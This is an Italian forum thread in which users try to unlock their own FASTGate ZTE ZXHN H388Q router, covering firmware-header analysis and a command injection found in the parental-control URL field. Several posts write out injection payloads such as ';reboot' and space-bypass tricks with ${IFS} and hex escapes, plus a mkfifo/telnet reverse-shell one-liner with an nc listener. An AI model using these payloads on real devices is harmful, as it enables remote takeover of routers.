[RICERCA] FASTGate ZTE ZXHN H388Q

  • 152 Risposte
  • 7697 Visite

0 Utenti e 2 Visitatori stanno visualizzando questo topic.

Offline ilsalvopss

  • Nuovo Iscritto
  • *
  • 44
  • Sesso: Maschio
Re:Nuovissimo FASTGate ZTE ZXHN H388Q
« Risposta #30 il: 16 Maggio 2020, 17:58 »
EDIT: Questo ci potrebbe aiutare? https://www.exploit-db.com/exploits/47654
pare di no

avete giocato con il bin del firmware? non riesco a spacchettarlo.. binwalk trova una sezione in LZMA che in effetti contiene roba compressa in LZMA ma l'altra metà non so cosa sia. C'è una netta separazione (..FFFFFFF..) tra le due "parti"

Offline LuKePicci

  • Global Moderator
  • VIP
  • *****
  • 2200
Re:Nuovissimo FASTGate ZTE ZXHN H388Q
« Risposta #31 il: 16 Maggio 2020, 18:51 »
Bisogna chiedere a questo tizio https://github.com/anphsw/mkzte

quel tool di per sè non funziona ma secondo me la logica da sotto è simile, provate a contattarlo e fargli vedere il file

Offline ilsalvopss

  • Nuovo Iscritto
  • *
  • 44
  • Sesso: Maschio
Re:Nuovissimo FASTGate ZTE ZXHN H388Q
« Risposta #32 il: 16 Maggio 2020, 19:05 »
direi che c'hai preso
Codice: [Seleziona]
typedef struct fw_header {
uint32_t fwmagic[4]; // {0x99999999, 0x44444444, 0x55555555, 0xAAAAAAAA}
.....
        char version_descr[24]; // like "THIS IS H118N VERSION", null-terminated
....



edit:
provo a mandagli una mail

Offline lorenzocanalelc

  • Membro Anziano
  • ***
  • 377
  • Sesso: Maschio
Re:Nuovissimo FASTGate ZTE ZXHN H388Q
« Risposta #33 il: 17 Maggio 2020, 03:13 »
Potrei aver trovato qualcosa di interessante, ma non so come sfruttare la falla, sul parental control inserendo come url
Codice: [Seleziona]
;reboot il fastgate si riavvia, quindi penso che quel campo sia iniettabile... Ma essendo il formato originale di un link non accetta stringhe con spazi, sono riuscito solo a riavviarlo... Ho pensato di fargli eseguire uno script da chiavetta, ma non riesco a farlo senza usare spazi

Offline larsen64it

  • Esperto
  • ****
  • 1773
Re:Nuovissimo FASTGate ZTE ZXHN H388Q
« Risposta #34 il: 17 Maggio 2020, 03:21 »
Non ci riesci ha dargli un comando alla volta?
Inserire in chiavetta un file eseguibile bash.sh contenente:
Codice: [Seleziona]
mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet IP.PC 6666 >/tmp/fo con qualcosa del genere

Mettere nc in ascolto
nc -lvvp 6666

Inserire nel campo
Codice: [Seleziona]
;/percorso/della/chiavetta/bash.sh
« Ultima modifica: 17 Maggio 2020, 03:34 da larsen64it »

Offline lorenzocanalelc

  • Membro Anziano
  • ***
  • 377
  • Sesso: Maschio
Re:Nuovissimo FASTGate ZTE ZXHN H388Q
« Risposta #35 il: 17 Maggio 2020, 03:29 »
Tipo?
Codice: [Seleziona]
;echo;reboot Una cosa del genere riavvia ancora il router, ma come faccio a farlo ad esempio
Codice: [Seleziona]
sh /mnt/usb1_1/sblocco.sh senza usare spazi?

Offline larsen64it

  • Esperto
  • ****
  • 1773
Re:Nuovissimo FASTGate ZTE ZXHN H388Q
« Risposta #36 il: 17 Maggio 2020, 04:23 »
Codice: [Seleziona]
;sh${IFS}/mnt/usb1_1/sblocco.sh
Codice: [Seleziona]
;CMD=$'\x20/mnt/usb1_1/sblocco.sh'&&sh$CMD
« Ultima modifica: 17 Maggio 2020, 08:15 da larsen64it »

Offline lorenzocanalelc

  • Membro Anziano
  • ***
  • 377
  • Sesso: Maschio
Re:Nuovissimo FASTGate ZTE ZXHN H388Q
« Risposta #37 il: 17 Maggio 2020, 09:36 »
Niente da fare, questi due comandi non li prende, farà qualche controllo sui caratteri "speciali"

Offline larsen64it

  • Esperto
  • ****
  • 1773
Re:Nuovissimo FASTGate ZTE ZXHN H388Q
« Risposta #38 il: 17 Maggio 2020, 09:39 »
Nemmeno il percorso diretto
Codice: [Seleziona]
;/percorso/della/chiavetta/bash.shper essere sicuri
Codice: [Seleziona]
;touch${IFS}/mnt/usb1_1/prova.txt
;CMD=$'\x20/mnt/usb1_1/prova2.txt'&&touch$CMD
« Ultima modifica: 17 Maggio 2020, 09:45 da larsen64it »

Offline lorenzocanalelc

  • Membro Anziano
  • ***
  • 377
  • Sesso: Maschio
Re:Nuovissimo FASTGate ZTE ZXHN H388Q
« Risposta #39 il: 17 Maggio 2020, 09:42 »
Questo lo prende ma non succede niente... su sblocco.sh ho messo questo
Codice: [Seleziona]
#!/bin/sh
reboot
Dovrebbe riavviarsi se lo eseguisse, no?

Offline larsen64it

  • Esperto
  • ****
  • 1773
Re:Nuovissimo FASTGate ZTE ZXHN H388Q
« Risposta #40 il: 17 Maggio 2020, 09:49 »
Certo. Prima di inserilo nel router lo hai reso eseguibile chmod +x

Offline lorenzocanalelc

  • Membro Anziano
  • ***
  • 377
  • Sesso: Maschio
Re:Nuovissimo FASTGate ZTE ZXHN H388Q
« Risposta #41 il: 17 Maggio 2020, 09:55 »
Si, possibile che il percorso chiavetta sia diverso? io ho provato /mnt/usb1_1 perché sull'argomento mount= della rimozione usb spunta questo percorso, quale altro percorso potrebbe essere?
C'è qualche altro comando che posso provare oltre a reboot? Per essere sicuri che sia un injection e non qualche altra strana cosa

Online FrancYescO

  • VIP
  • *****
  • 2631
Re:Nuovissimo FASTGate ZTE ZXHN H388Q
« Risposta #42 il: 17 Maggio 2020, 10:08 »
prova a fare urlencode del comando, gli spazi sostituisci con %20

Offline ilsalvopss

  • Nuovo Iscritto
  • *
  • 44
  • Sesso: Maschio
Re:Nuovissimo FASTGate ZTE ZXHN H388Q
« Risposta #43 il: 17 Maggio 2020, 10:14 »
provo a mandagli una mail

il tizio dice che non sa come trattarlo, l'header dell'h388q contiene 400 byte in più di quella che si aspetta lui

Online FrancYescO

  • VIP
  • *****
  • 2631
Re:Nuovissimo FASTGate ZTE ZXHN H388Q
« Risposta #44 il: 17 Maggio 2020, 10:19 »
prova anche a sostituire ; a && in quello sopra
Codice: [Seleziona]
X=$'echo\x20ciao';$X